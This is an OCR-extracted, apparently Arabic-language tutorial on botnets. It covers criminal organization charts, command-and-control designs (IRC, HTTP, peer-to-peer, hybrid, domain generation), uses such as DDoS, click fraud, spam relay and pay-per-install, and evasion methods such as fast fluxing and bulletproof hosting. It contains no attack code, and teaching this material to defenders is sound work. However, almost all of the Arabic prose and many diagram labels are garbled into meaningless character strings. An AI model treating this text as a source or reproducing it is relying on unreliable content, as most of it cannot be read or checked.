J botnets DDoS j DoS ijfcs tULlu, j£i L£ . f j^il cjUij j DDoS/DoS t-^j ^ *jVl 

"security-compromised systems" aSjI^I <>Vl <> a^^^j ^zombies 




(Organized Crime Syndicates) <uIaiA]) <UjjaJ) cjLUs^ 

t^A^u* <LaiaLa CjIcLa^. 1> a£ diAJ .dilc a ^ ^JjIasu ^jVl .4-^-* L-LujI^q ^jji^j] Jilabd cJ^J^ <la±aJI ClaLi^ 

Jja ^ a^jsa* dijl£ cjISI^jjVI '2010 ^ Data Breach Investigations j^j^ .<>Vl 3-^1 ^ ^ 
.4_iila jll 6 j&^-V (jls j l ^ yd Hacktivismj ^hjj-^V^ s-O^ ls* a^^IaW aj-J CjUI > 11 



(ORGANIZED CYBER CRIME: ORGANIZATIONAL CHART) :VjJ^Vt ^JJ^> ^'-*^> 

JjuoLoull ^ jiabd ^ J jVI The boss .Sj^W* ^j^V^ uj^j^ ^ . J^VI tthe boss ^ jj^V^ ^j^^ 

f^j^' s^USSI ^ ^Ull (>a ^J! Underboss ."underboss" > c^^^ l^j 1 ^^ o-a^JI -c^J^^ 

^jjill ^jjjUII m 'e>^\ jjb q\ > ^>^> ^^ic ojinjMill j o^Uill jj-i? j cIjU^a ^jJJ ^ j^Ui ^1 jjia (jl > j^j^ Underboss .'Sh^j^^^ 
J^-^j campaign managers ^^j^ ^ ."campaign managers" u^j^ "underboss" 
CjIjUJI ^Uj ^j-d j j^^ll £j jjj CjI <ujl CjI^jjuj ^I^jjojU djUUJI ^jjajjoajj CjIa^JI uj^j^ ^ > ^ ^ j^^ll Cj!>L<^. 

.Ai jjjoiaII ^-ta^ u^j^ .CjI ^ s jj^U-a resellers V ."resellers" ^iajajl jj I^jjoj ciuj ^1 

Criminal B-osus 



UndDrbos^: Trojar Provi der and 

Manager of Trojan Command and ComroF 



Cj m paign rVl «.i ■ « jgu r 



--i A.ff i I i C i C* n PJelwork 



Campaign Manager 



AfTtliation Network 



^^^k Sl-u Icn D l i L . i R i - ■_■ 1 1 1 ■ r 







Stolen Data Reseller 



jcvffili on Network 



Stole n Oat a Reseller 
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Botnet 



Cjjjjj £ r\U^A \ .CjjjjjII 4 ^}*)\ jL^aikl Botnet tdjUJill Jt*^ c3^ai J 'Botnet 6 ^C5-^ j Vjl 

ia^a j - gallj V ^lLj^a-<J! . - iklLu^l <J^.,Xj (JJ^ l>* ^W*^ (jc jasu ^alc ^lkj^a^ ^''bot" ^— J J^ J> '"robot" 

*J>^ yr* J^j V J^ ^j 1 ^ 1 6 j*^ 1 J "first person shooters" FPS < lW^ J& .^j^ 

CjLdl^kjjajVI Jc- Jlla .4_jJajlxxJl l!^J ^ Jc- J& J tliLoj aAl^xi djl^l^. jJ L&J^J botS 6 ^ .botS is**** 4-1x131 

<!!)Ljj C jl ^iLaj^axJl I^A ^l^kjjojl 0JJ3 ALa (j^Jj .(IRC) ^J^V^ LS^ 0 ^-^J-^ ^ J botS {j-* 4-C-JJJ^>Jl 

.AlnaJ) dltj jJjjll t *>>^> j3 ^Vimj L_fl jjoj l_jU£JI J^lk ^ botliet ^Uaj^xll tdjl^j^ill ^ 
(Jj^j Afjj L_flVVU Ia^IAsu 4_x^jJa aSliA 6jUc ^ dliS jA\ m ^ jA\ ClijjljVl aSliA 4_La J^*J J^J L - L ^ 

4^juJ| j& aJu^ajoW (j^J ^Jjoiiill .AlnaJI jj (jja^jj (jy^la (jc Asu ^jc I^luajj (j^J jJl <3jlk-<Jl CjVI (^jj^IaII 

CjVI tdlii jill J <J£joJ! <j!>tk Clii jA\ aSlAj! A Innna i> Jaj /ajLjall £cxal^)Jl (j-a l& jac* (j-d dlii jJl J^ 

Ajt-dl^i Jasu Aijli^ll CjVI (j-a A£jjoJI £>i& ja\ j\ <j!>tk (j* A^. .^ig^Jl botS I J^f^ (jj^J> s>a\\ j\ aIj'W *\\\ 




<"bot herd" 5^ ' M bot army" lh^ LjAw (>j .^^1 f U«iSfl ^^*it "botnets" ^j^l ;4iajal4 

-"zombie network" ^jjJt '"zombie horde" ^jj^t 

j-qI jVI j^aj ^-j j^i ^ ."botherder" jl "Botmaster" ^ ^ ^j*-* ^— ^ jJI J^ SjL^l ^ill ^l^SI 
'C&C uj^ jJI ^ ^1 ^ c^'j '"botnet's C&C" ^ jJI ^ u t> "bots" ^ j^i 

Jc xij c^^Jl ^ J^'j ^W^^ lSj^^j ^I^jjuJI 4-^-1 jj 4_il<iVI (JSL.aa11 ^ixklj ^aI dijj jJli .ciijj jJI 4jjouj^)3I 

„ ^jt>.»l Cj^Ij] CjI^jjuJIj CjIjI jjll xi! dlilaxj Clli^ '2007 ( a ^- c ' J^J 

^li 4 ^hiVl .3_^AkJI ^ ^jLftjaJ! ci il (JLujIaH JjS ^ ^-^i ^AaJLujj ^j) (j^j ^jSl j tdijjljyi A^f^ Jc spideringj 

."network of compromised machines" *3 jikJI s j^Vl c> <jJ 

."Can be coordinated remotely" ^ c> \ f*u«?\ - 
."Used for malicious activity" J-j* LUij J^l ^> ^^i^j 

"network of compromised machines" ^Sj^aJI Sj^Sfl (> 
"Can be coordinated remotely" ^ 6^ l ^j < nn 
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"Used for malicious activity" J** JaLiS <> ^ 

."Host component" < <j > ^^ t 
."Network component" 

"Host component" < cjUjI* 

'"malicious agent" < *ur^ lUUJI .a*_> <jc CjjJI ^ l^J Jll aS jikJt cjVI * jUo "bots" jy^- 
.bot agent i^*^ Aiji^ *\\ s j^VI J a*j ^jc ^viN (j^j ^ill ciinaJl <J-aU.II \ '&aa ^j*^ a\\ s j^VI J in>Vn ^ill j 

t_kL Jii J 4jI1> 4*j15 dii^k j^jc jjlj Bot agent "botneVs host component" < j^jc j& li* 

.malware component cS^J "botnefs host component" ^ jJt < <j > ^* 

^Uill Jc I j^IS bot agent 4 lSU^jVI <LataV 3 ^/"^ j .dia jA\ a£aA j^lx. ^ JL^aiil ^Uijj bot agent ^j- u vhj^ jJi 

"Receive and interpret commands from the botmaster" ^ c> j*'jVl ^ 

"Execute attacks" i££ 
"Send data back to the botmaster" ^ Jj ^ULJI Jl^jj 

"Network Component" cjUjI* 

;4_JU3l Ciij jJl (JjS a£jjuo3I 

"Command and control channel" Sjk^Jlj s^Uill sUa 
"Malware distribution server" SjL^all ^jJl (yjj^ 

"Drop zone" Jal^VI Ailai^ 

"Command and control channel" Sjkf«2tj SjLaII SlS 

1^ ^1 ^ ^311 cJjL, jl! ^ ^Ij ."bots" CjjJI cdjL. ^ j! >u ^il! j^Vl * JJA ^ (C&C) f^Jij S^UJl SUS 
"Command and Control" s jW^^j ^^11 ^Ikj^xJ I .CnijJI djjJI ^jjuj C&C j^i ^ .^"j^^ J 

"bots" ^ ^ > ^ ^j^j tASj^ftll iVT ^ Aia^JI j 3 >^>^^1 CjI jSII j '"botmaster" ^ ^ .^UiS diii jJI 

ciiii jjj j laj i oj Cj jJI ^jjuj ^ji ^A^^kVl Cjl^j^ill (jo duj jA\ Lft li^j .ciijj jA\ J jii^Vl jj^ixJI C&C 

jl^l ^ ^LJIj tc-jjlSaJI j& C&C o\* 6 <-S j^' *^ .C&C uj^ lA^s u' 

C&C lU^ "bots" ^ jJI ^"traffic" jj^l ^j^j ^"server" '"channel" sUill C&C c3^ > ^ 
.C&C traffic C&C sia j CjjJ! ^ yr^ j 'C&C server ^ C&C ^US AiL^I uJ *\ jVl ^ 

"Malware distribution server" SjLiaJ) gAljJI ^J>U ^ 
6 bot agent J ^ ^Vnj^ll djU^jJI djU t Ljjalujj jll j dujiiVI AinaJI djU^jJI £j jjiil ^iL»/^Lk 

CjliLJI jl t^luaJI daLi^ ^j;^ jj^Uc J ^ajLAao <JaJ dii jJ! 1 * ^.ll^j CjIjj laallj t<-<il^JI CjliL<J! Ia jjc.j 

."Drop zone" iail^VI 4ilai4 

.<juaL^ CjLd jls«-<i j t4 J> y"i\\\ CjUUill tA-JUJl (jljjVl 1^ J'^-* (J^ (j^ J J ^ tdiUi jIslaI] S>lual ^ dllJ jA\ 
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"C&C STRUCTURE" C&C 

jj ji.vi t^JLi jl "bots" <^ jJl J) ^L«ji»Jlj >»l jVl >£i ji botnet's C&C J^>> ^ 

:C&C J^a t> £l jjl ^ jJI 
"Centralized" ^>>> - 
."Decentralized" ajJSj-5U - 
."Hybrid" ^ - 
"Centralized C&C Structure" <$ j*>»n C&C J%& -4 

"Z>o£ master" ^ jJI 4 W^ j ^ ^A** j j*jj ^ . j*l jVl jl^-aj ^ c_u^ "Central node" ^ j£ 

."bot master" djJI JjS ,> l^jjbj ^ «^ ^^VW "bots" ^ J^l jSil 

C&C <J%* <^ >2u £t*ji ^ Uij jaIjVI >tt 
."Push style" ^ - 
."Pull style" ^A\^jU - 

.bot agent j*Vl <*i^ ^ jSj ^->jJI ^ "pws/i sty/e centralized C&C structure" csj^j^ C&C J ^1 J 

Sjlnjmti AjJ d jJl ^Jjoj jli ttillil 

A *v uj^ _d^^l (_^ Aju j ^a^U ^j l lallj VI^ C&C J "I)Ots" < -— ( Jj L ^ .J^ ^JJ L J*J ^ liJUdU ^3 





ill* - ^- 




f 1 | Post Command 








IRC C&C 


R&c&rve Command ^--^^ 


^^-^^ {2} Recede Command 


in Real lime 


Real Time 


^^^'^ C3) Res|>oo&& J ^-^^ 


^^^J3) Response ^^--^^ 






Bot 1 


Bol rt 


Logged in to IRC Server 


Logged in to IRC Server 



fS a-j ^ IRC SUS J bots ^ di^ .(IRC-based C&C) IRC c> C&C c> o-^ cJ^ ciM; ^ 
. j^Vl ^ jl lit gttall <jU1^V! j dUlj^YI iUJU ^jSj bots ^ u 1 ^ < j*Vl ji^j ^ j^? ."bot master" djJI ^ ^> ^1 jUi^l 
4 jjjliiJI liA J .C&C c> dli^j]! ji djU jkJ! c_i^uoij ^ jij bots jS C&C lS^ja ^ "pull style" s-^t M J 

l-l^j nj "bots" L — 1 jJI ^ j j^^l 1 jJI , ^j jaj ^ j .Wr^j <J jJI j "bots" ^— 5 j^l ci^ ^ cl£^ 

l-l^j bots ^MLs j^lj^ 1 jj^j diSj j;ikU3l t . ujoij ^qjq^\i diS jll bots ^5^* L — 1 j^' , ^ ju ^ J 111 ^ ^ C&C 

m JlA\ J^ J£^l jtjl .C&C c> j-ljVl 




BoE 1 &ot n 
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^Lh JL^Vb eJ £ "bots" ^jJI ul ^ ."HTTP-based C&C" HTTP J* ^aill C&C ^ jijU-JI li* ^ L. LH& 

."HTTP response" HTTP ty*2*-t c> j-Vl J&j (HTTP) JA&jj* 
"Decentralized C&C Structure" 4 J*>3UI C&C <J%* * 

Jc t . up ^j£| jj tgjli tajbVI 4-1 J£^J ^JaLuijll ;LI j^ll ,jjA*JI j3 jj CjIj jjj Jl j-a 4j j^jxJl C&C cl)^ J^ J^ 

V <JaHjujj jl C&C Jj J J^ 3 J ^? ( : * .dltj jJj J <jj£j-a JJja <Jaij Ljajl j& (J j^J-^l C&C (jl .Clilj jJjJI 

^.1 tilU& jj^j J j£J j tl^L^c J 6j-<iLaui Jl jj V CjIj jjjjll j>* <jj±kjj CjU j£-<JI jl el li^ /o^jlill ^Lgj^c. CjIj jjjjll <J*^3 <— * "cJa*^ 

j-a jIj£j3I ^a^J 6^.1 j 4<j JJ* J^l C&C <J^& I J^^P" I^A dljjjjVI j-aj^a (ilj^jj /o^J^aJl j-al jVI 4_A»JaJj 1 frjlc jLjjulJ 

j^Ul C&C ^ J%J> liA ^ j^j .C&C J ^ ^ 
liA .^ijt jikJI CjVI y-A "nodes" ^Jl .J^l j f^l C&C i> l£ <j^ lU*j "nodes" ^Jl <cs j£ C&C ^ J 

Jc SjIaJjuJl A j£ aJ Cj Jl ^Jjojj .Ul jLjJal ( . UjujJ Vj CjIj jJjJI <Jj£j V 6^.1 j C&C * ^* r - JaLLail .dltj jjjjll (JJoil 4_jj£j^3l ^ lafljll jJj 

."peer-to-peer (P2P) botnet network" ^ J^ ^£jA> ^-^5 ^^>S l£ j* j^^UI C&C .lSj^I ^ t> ^jijjfl 

mL g j^JxJl C&C ^li ^J jJjjll J^l c> lU*^ jJl *^LjaJl Jjjllill <-o jlift jj£I Ig-Lt^J P2P ^ItjiVi 

^ jtnai jl ^ j^Vl ^1 <> P2P client ^ ^^Jl lSj^j c> ^^m^l P2P CjULJI J^Uj ;P2P CjUwIuuI 
cj! j Loiioa l ^ij ^ij jlSaJI t^UI ^j^il P2P client c> '7*^ index" ^1^1 j^>» ^vimj j .^Ijiall P2P client 
cilli Asu j^»jj .^^UIojVI ^5^^ jl L_aLJI jj^l ^ P2P jj^ 4-j ji^xJI ^1^31 jc^ "peer queries" ^^jJI 
^j^j o^lcl .P2P J jjj Jc bUuel liUi j '"peers" eft Cy* ^jI jJj jl '"peer" ^jIjSI ^jjSI l_j jUa^ll c aUl 

.P2P client c> ^ ^ ^l^UaSlI 

. JjLuijJ) j Cj j^all JH2 Luajj ^Vmn l^JI Cjja .Cjlil^l JjLu uJU Jl ^j^Sfl CjUIjIIuuVI o-a ^^lSI Ajil P2Pl^a J*A* 

g- IjjVi Jl P2P Botnet ^ o^j :P2P Botnet e 1 ^ 1 
(Those that use the existing P2P network) <JUJI P2P ^^ki^i ^1 ^ 0 
(Those that build their own P2P network) 3-^UJI P2P a£j^ ^jjj ^1 tStts 0 
.leeching P2P botnet j parasite P2P botnet ^ J) c5 j^Vl ^ ^<\v^ aJUJI P2P Cjllui ^^kl^i ^1 P2P Botnet 
dAj jJI leeching P2P botnet J ti^Ull P2P a py™ ^ ^ 5^ ^parasite P2P botnet J 

^parasite P2P botnet J .yuJI P2P <^ J^b JaSa u^J j ^ j^VI J u .^ ' ^" 1 ^ u j^ ' ^ c> c?^ uj^ u' 
l>«j leeching P2P botnet J ^? 6 P2P c> * ^ ^ ^jJI <jj!^ jj> bootstrapping 

.P2P ^ Jl ^U^j^U bootstrapping Jj ^ ^ P2P *£*5 c> U> V Jll ^U jJl 

.P2P iS^A J! ?^^VI ^ bootstrapping ;&j*1a 
V Bot-only P2P botnet bot-only P2P botnets ^4 P2P ^ cjf 5 J 31 P2P Botnet 

jl j^JaJ liA .<j^aUJl ^^jjj <jli ttilli j-a V^J . J^Vl ^jl lij tfrla ft^liluiVI j^J <jl j^ ^ Jl J^ 6<ajU3I P2P Cjtlui Jc^ 

.P2P ^J>" ^ >^r*t SAi^ jll ^ CjIj jj3I 

:^j£j4!iUl C&C J jaljSfl >^ O^J^ J^ W^J >^ 

."Pw^/i 5^" mj^' - 
."Pw//^jfe"^-!iM>i - 
fj jx»j tdjjjJI j^ a^j^» J CjjJI ^ j^Vl cj^"bot master" ^ Jl ^ ^ 'P2P C&C ^ J "push" ^1 sj^>l J 

tlgJ SjjLa^lt ^jlj3) j* Jj ^J^j) ^Ic-V j^djlj jjjlldll ^aJ .IgJ jjl^Jl <i!j£l Jl ^aLdVI Jl J-«l jVI ^i^J dj Jl ^ jSj 

jj£j ftjjU^JI jljSVI jV ^ Jaj c5j^VI CjIj Jl Jl j-ol jVI jl ^ill li^i ^ jll 4-jjJI .lj^ J 
JfllS ttilli Jl AiLjaVU -C 5 j£jJI C&C J ^«^l S- 3 j^J <jjILJIj dj Jl ,jj.uJ JjiaJI diajll ^ SjUj>h\I jc^ AxJI J£ S^isu 
j^ j^ ^U^l cilLj ^ili j leeching P2P botnet j parasite P2P botnet £ Jl J j t J^xj 4J ^ j^l jVl 

^ajL (5^1 dj Jl jli ; jjJC JjoJI f \ - ^ 1 jjj dj jjll ^Uiacl Jl J-aljV! ^J^. jJ ^JJ jl jUuiaj (Jjlastjll < . llaal .A^JjuJl J f 1 - ^aC>l£ 

J J^Ja^ ^— * Jl ^U Jl .I^jc lai Jl j ^IxlaiVlj a£jjoJI J c5^>^^^ J^ J 3 ^ J lajjoLo J^-g L_aLd ^jujI cJ-^^ ^y^^ 

Jil P2P o* * j& JllJI djl jl£ lil ."Forward bot" j^>^l o* 

CjULJI dlaall ^cjIjj 

j j j^Vl jji^j ^jj Jj^ .cJ^»l Jl <jjja "in-band message" Jl j^ j^jJ^ cJ^ j* l^l^i^l c5 

cJ^U. . ^^IxJl P2P ^J^J <^jUl« JJJ^I ^J^ jV l^JC ^li^l L-Jxj ^aJj iiiiill 4 ^ ui <Ljla3l d^A . Jllftll dllj Jl l^£a j£<»J ijlj JaSfl 

.cjLoj jjjill ^iljj j^ c -a->- ^ l j^ 3 ^ U^!^ 6 "out-band message" <a Jl W^j] ^ J^ Jj^JI 
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dAJiA "out-band message" JjI— 'j W i4 n\\h\ \ P2P jj>> ^ "in-band message" : <Qaja±4 

.P2P jjj* 

^j]| j (jjjj^il! J Cjtj JJjjJl ^1 J» Jc ^ dj^liuaj glj-^l <iaLaUJ dj jJl ,1Loj ^jL ^P2P C&C J "pilll" ( : ^ M J^' J 

dltj ^Jl \ g 1C C—L^JJ C_fl jjul (JJ^-Il ^5 jl I SJj a\\ S-UjuiVI 0 jlA .(JjjlgJl ^aJ5 jl 1 SJjud^Q 6 ^ ^ all S-UjoiVI ;J J ^ l^J^jLuUi ^JJ 

S-Luijlj ^J^J L- jjoj t^-aljVI ft^A L-L^j nJ jl CjIj ^Jl (Jj^a^J (jl (J^.1 .6*11*1^. ^)-aljl J^ (J jj^a^ll *L^U UJ-^3 U,ljc alalia (J£joiJ 

4_LtLJI '"^^ i Jl u^J^*^ . j^j*^ j-*^ C5^^ '"^^ 1 ; <iajjj-<JI (jjjl^SI ^jSj CjliLJI s-UjujI ^jc <J^-^ CjU^tIuiI 

Jc J^l l—L^ uJl £>i& L-L^uoi 4 lal uUJ lIiaIsUjojI jll CjIj jJ3 (j^J <j-G .l—bftlxlail jll dltj Jill A^lxla) V I (j^X^-JJ L_fl ^jol 

,CJ Jill AJjuJ <Jj3 (j-Q Cjj^j^ ^31 j-ol jVI 

"Hybrid C&C Structure" 0^ C&C 4- 

^ j^j^ tSj^^j I j^j^ .AlnfiJI ^-al^&l ^jj'q^'^ ~* • uj j J U (j-<» Uata qjAslLj^ djjlijVI ^^a^)^ ^jli t^a jl* j& U£ 
<j-*aja S^LjJ tilli . j^-VI (j-a JjJaal C&C j uj^ ^ ^ m ^ l_a jjla Jla J ^1 ^-^jl ' .l$ j^j**^ j lS j^y^ cJ^^I *\ 
f ikiuij ^11 5JlftVl ^1 .c5 j^^^Ulj <j j^^JI C&C - ikiuij g II C&C \:° v; ; j^a^I^I ^li tcijlj jjjjII 

.ZeusP2P/Murofet combo > j^l C&C 
JSja ^^lun ^ill j t^lii^VI C&C J) 'peers ^ Jl^VI J^a ^ j c^^l C&C ^ P2P ^ jjjJI ^ 

a ikluLj c^j^j^l ^ ULuj 6 1 ^ ^ J Iklualj C&C ^ 6Jj^Ua3I jL^ajVI (>» V^J <jl . O^J .L? C&C 

^ j^J 15 e% (DGA) domain generation algorithm ^ ot* c> ^ ^ c> ^ 

.^^lill ^LuoaVl J ^jj^ ^ > o ?DGA j& ^ / ; J 1 u ^ 2^^^ J 



(BOTNET USAGE) 

(joaJ 6^.1 j 31^ . Jxull tlijj jJI .S ji jj£I pj^al UK tcilllA ji& UK dii^ .4ijlgJI jI^VI yi ^ diii jJI S j£ .AjAaMI ^faJl 

I^A AjU ^)^l (_^^ll (jl J)J*sll JalLojl (j^J 1 \ A^Xj b^AJLlulA ^ (j^l J 6^"lc^l ^.^t^^ ^j-d ^)^l 

."botnet" j^jj^ ^- ui ^ ^^^Jl (3flaijj ,^1 jll c v^\l ^ cJ^j J-^l j > ^1 c^-^- j * "j ^ 

.dluflj uaIajjj jbljil di^j (jj%i jjt py^W CjU djj jJl (jjluaL 4^^L uaII CjLaa^JI ^ (JJ^au^IaII (jjo^^j oti ;Aia^^U 

til^ldl Jid 4Jla ttilli Jl 4iU^VU . u>» (j^5 ^3 Jll ^lg-^l ^bl oj^la ^lg-<Jl t<^H<JI ^jjjujUJI oj^ll ^ 4_ix£3l 

^bV (j^uJI (> cjIjjjjjII J ^i^jll Jc^ s j^ll ciik^ "computing cloud infrastructure" ^?U^JI aji^W aSiA\ 

• Jj U "bots" 1 j^l > ^ ^ ^ ^b^'^'iU iaaa <JUi ^31 ^Ig^JI 

."DDoS" <^^JI c> u^j^^ CjU^jfc 

"Click fraud" J^VI ^1 J± - 
."Spam relay" gc- ^j^^ 
."Pay-per-install agent" J^jJI ^ - 
."Large-scale information harvesting" ^ j $^ ^ ^ 

."Information processing" CjUjkJI <^JU* 



M DDOS" jj-^l ^-^1 <> 0 U J^t ^U^Jt 

(Jjujj (jl (j^J A^-lj fl^A c V^lun Cj jJI ^j>» (jj^a^ .(DDoS) ^ j^*^^ 4_xiAiJl (j>» (jU^pJ! CA 4_JUi j5^lj (jJ^jLauJl jj£I 

; JU3I J£j^1I J UjIj U£ j^JI liA J UUuJall ^ ^j^l JxilU ^Ua 



4-uIa ^^Lua 



1073 




VICTIM 1 
The Com prom insd Machines 



VICTIM 2 

The DDoS Targel 



C&C 



Bote 




Targe t 



"CLICK FRAUD" J^VI cAJi 

(Jtj!^.V! CjI jib ^g-^nij L« 11a j ^^ia^I^aII JaJI ^ dAj^lcVI Jjjs jaiU p^-^ jj V liLJ j^a jjuJ cj jA\ j>* l_aWI 4_ia jj j* 

.dujjjVl jj iW *ll ^jjjjujUJI j .clujijyi ^j^xJ JLJI Jlii^l ^jjujI <^a &1a "Click Fraud" 

(J^ic-Vi jajIi ^ lii .ciiaJi ^Hjj ^si ^ji C5 ic djU^icVi ^5!^ Djii jsj ^^iiu (jj^jij cujjjVI C5 ic j^i« *ii 

^Jc jilll lil j^Jj . Jl j-*VI *>1a J£ c^c- J 1 CijjjjV! l_ laall ^1 j-d jli ;4_loujj3I CjIaKII jc l_ laall 4_iLgc j!)tk j^Ja 4JV 

j^/lcVI L-jbauji £Lx»U^)J (J^lk j* £^1 jJ ^JJ Li S^lc j>Jl L-LaL ^ cJ 1 "^J* tdjjljVl c _ 5 Jc Li ^ J^- J* j^^-VI 

j* 4iii^a -lafl^j ^L jJI ^^L» tcilli j* -( *iJI c> XlOO V L-i^L^a affiliation program" 

a! jac o-^^ 10,000 <>j^ j <*V X < <*i^ <^j5jVI ^ jjul**!! "^Ijfcll i> 100*000 4jj X ^ 
Jl£j^l j* J£^ JxilU j$i t^UjJI ja ^ j^ JUJI ^i^ ^jj <j| lAc. Si* j "ad affiliation program" u^V^ ^jLoaliVI j^^jj 

.cilll A\ ^ ja. jxJI (jc <aJU3l c _^c jJj (Ja.^31 j) jAij ^lajaJI C5 ic jV Jl j^VI 

.Yahoo! Affiliatesj Google adSense a^^V^ ^^"Vl ^Ijj ^ JSI jt ^lj ^ ^j^l £ j^j .^^Vl 

L_fl jjoj liA j .CljjljVI (^^ic ^^ic 6^ ja. djlj!>lcVI ji^l^ J laJ > o diaJ ^^1 dj jJl ^LujjU ^ajlj 6^.^^ J£ (j^*^ 

jai La£j 4 liA . jAU jl (J^- LS^^A 3 ^^1 f"" ' " 6 W AjuUII CjI^jjuoII l^lajj .djjJjVI <ajjuj ^^Jc A\ JjS j>» ^iJl ^1 L$^J$ 

. Jl j-^VI JjuasJ aL.>.»j JxilU jA cILLuj 



"SPAM RELAY" £&>2I AsjJ) 

^j^)JI JIjujjI jl£ t JjS .spambots cg^^ 5^ ^^)^ *^ L - J ^ 6 ^ .f j - ^^ ^^)^^ u -0 j^l 

£tC j>Jl ^^>JI J^Jjj ^ <L^)ia3l D^A j>Jl ^^>JI ^^^iuJJ-d J 111 L " ^ jIaxJI CjWI JJ5 ^^C jl ^a.lj ^>l lalLujl J ^tC^<Jl 

Aijjia ^J| jj^,liaj "Spammer" 2^*3^ ^j^^ cg^J^ ^'^ Mi j ^ u^j j v ^U^l (j^j aj] ^1 AiLjaVU tAJUi ci lou] 

.diii jJl J^c 4j3 (_^ilt jla>JI jA liA .^cc j-<Jl ^JjJl JLujjV o^J^a. 

:bt>lt ^> jjjxi) Jjj M 5/;am /f^/aj" ^j^JI 4rfj#M J^-J 1 ^j^t ^l^a^l 
.'T/i^ identities of the spammers can be hidden" lUj^I <^laa.j 
."77ie identities of the spammers can be hidden" ^>JI ^j^l j^i^ ^si J j^im^ l ^> jjSj 

. jjill ^^Ic JaUi jl ^1 ^cC^<Jl ^^>JI j>» Cjl-LaSJ ^lauij ^^^jlill (jUaill ^jiajCj 4_iJjjujlaJl 6j^a3l jx» Jlc jSl jj 

^AiliLJI ^1^1 ^bU ^jii ^1 CjIjjJI jjj jjUjlU "spamming process" j^3^l ^j^l J^ jl ^ u' 
Iaa ^AjjjiaJI g&y*l\ ^jJI JjIwjj ^UijV ^lg-^1 ^1 j.^a Ur > aj^j JaVI ajJ "spam campaign" ^3^^ cJ^ 
AijUaxJI iaxu ~i iklujl j ^cc^^^ c^jj^V^ ^J^^ t * a -^^ "antispam" (^Js2l\ ^jJI <ail^<> J jla. ^jja U^aJ J1<»j l^i*aj 

:^a j^iUJI d^a ."pattern matching" 



https://www.facebook.com/tibea2004 
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"Senders list" u^j^> - 
"Receivers list" u jV^" 1 ^ 4^ta 
"Message template" JIS - 
c> "Spamming" ±*jp>jA\ <^jj£WI Au^' cB-^j) "Spammer" <^>^ ^jJt yr^J* 'g^' <-£^l ^ 

J W*^ <4j "spam campaign" <^>J1 4l*aJI j^Uc ^ cSj^Vl ^tacVI CjULj jJjVl .botnet's C&C 

j^u^ ^I^l.Ij ±jA\ spambots f j% .botnet's C&C i> spambots <> 

■g^j-^l grbj^^ Au^' JLujjI l^j ^ "spam campaign"^ 



(1 ) In i Male Spam Command 



[2] Initiate Spam Command and Configuration Files. 




Spam&ol 2 



SpantBot 4 



[4] Send Large Nl Limber of Spain FJ-n 



j^a tC^jjajjjljU ^ jjjiS] Uaj .Rustock botnet gr* s J^ 1 5^ (^jj^VI ^j^l t> 
JUj] ^ s jjISj spambots jj^ f j2 ^j^J^ ^Vl <> ujJ* <> l^jL U J Rustock botnet s aSjIlJI 

."PAY-PER-INSTALL AGENT" JA» ftklf 

.(Installation of legitimate software) ^ijJi s^j^ 

.(Installation of legitimate software) ^in^JI £jLa^jjll s^j^ 

cAZj .201 1 <^ C5* USENIX Security ^ j (PPI) Pay-Per-Install Agent c> ^ ^ ^ ^ 

<j*l£ 6 jj^W^ u'j^ *jj£ ls^j '"Measuring Pay-per-Install: The Commoditization ofMalware Distribution" 

; ( _ 5 JU1( <j!>tk ^j-d IfrliAaj (j^j .(jjjuo^lj (jj^ j ^jl jj > >n t jj^)^. 

https://www.usenix.org/legacy/events/secll/tech/full papers/Caballero.pdf 

(Installation of legitimate software) 

4^jjuo3l JjS ^glc (Jj^^J ^ ^<JI li^ L-L^L^a / alia t flj > . CljjljVI 4£jjoi (^^Jc cd3 ^ uj cJ^^ 

(Installation of legitimate software) ^imJ) cjU^jJ) ^ 
DjLiJI ^1 jA\ jajj jl l^jLi ^> ^j3Ij 4^hA\ ^131 j& Deployment provider .deployment provider ^jJ' 



4 https://www.facebook.com/tibea2004 
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cljVVI iy> L_flVVI (jlaJ Cj jJ! ^jjoj Ikij "malware deployed" uj^ > *N 

jl^. jl 4£jjud3l aU^ ^ LlufLill aJJ > 0 <jl£ lil LoC j <lnaJl CjLi^GjJl JjuU aJJ > 0 L— Ll^ Jj <j£ (j-G C allk-j <Ld,lk]| (ja! \ gjlr. dl±L<Jl 

CjLi^XiJil] a^L^. (jj^J ^ D^lc i^jASUd £jj JA ^JA SjLjajl £LX»!ji3l C-LUJJj (Jj>^j3 Cjlj Jill ^Ujdjl AJaLudJJ (j^J ^— J J^l *lbol .(J jlJl JJ JA1a£ 

tjij^ AiuaJ) cjL^jJI ( *jja jl "botnet's spam relay" gc-j*^ l>* '^UIojVI j& j^J jLjI .4-i^uJaJI jt$j> AlnaJ) 

.(Jj-o^jII £3 ja (Jj3 ^ja aIaa^j! 4_L^aj jl 

"Large-Scale Information Harvesting" J^aj ^ cjU^^a]) ±^ 

lifc 4-1^. JJ .CjLg jlxJl I jSjLaJ <J-G Cj^L^. t ■ UjuJI J& .dljjjjVl (^J^J CjUUill (JA L-l&i ASi Lq (jj^J (jl (j£-<uJl (j-a AijIkJI 

.IgjL^a J a^I g all a J^ l£^>^ l — ^ J^*-^ J' 6 (3^^J ( ** d ^ UJ^ U' ^ jl*^ll AijjJuJ ^jjjLujVI j& ojLjajl ^cxil Jill ^ jill 

^Jj^l CjWI (jJJ^^UJl <Jj L_flWI dill* CjU» jLlxJI 4ijjjal C5 ic SjAslI tdllj Jill JJ^-la O^J JJ* > ^> ^I^C-j <^i a±1 U» 6^lc 

^CljJjjjVI <^-<<»J^-a 1 ^-aIo j laJ i oj JatLaiVI ^ s * L>^ AJi^ <3j^)jaa>Jl CjLd jlx-<Jl L_JJ^)jaaJ (j^J t^Jjoilill aA*J I^Jajj J 

CjLg jIx-aII AijjaiJ l^ij L_fl jjuj l^-jli tl^Lxij j diUi jlx-<Jl (JjIjuj (jj^ ^n/n aIj q\ >1^^aj .PPI agent l!^-^- ^'^^ (J^ 1 ^ (jj^J 

"Information Processing" cjUjk*]) 4^JU-a 

^j^^JI 'O^^ c> Aj^j W^l "attacker's malicious cloud" ^W^^ 

^-^.>.>ilirj| 6 jail J^l^. (j-d AijSLxJ (jjstlauJl dlS jll ^jn'qj <Jjoj j^JI JiLd J J^. j . JjuJI 



"Botnet Protective Mechanisms" ^j^jj 2 * 

Bulletproof hosting 
Dynamic DNS - 
Fast fluxing 
Domain fluxing 

^j^Vl dAi jUl ^ ^1 jl£ lil AjV ^C&C L>^ U^J ^ ^ Uiajl ^ c5j^Vl dilj jJjjl! CjU j£<» 

Jl jj V dj jJ! ^jjuj ^jV l^A .4 alia a <£jjuj ^jj-g Al^iajajV CjIj jJ! (Jjj^j o^lcl ^ Ll i mjj (j^J CIj jJl ^jjuj (jli toja jj>» jjc. gaj 

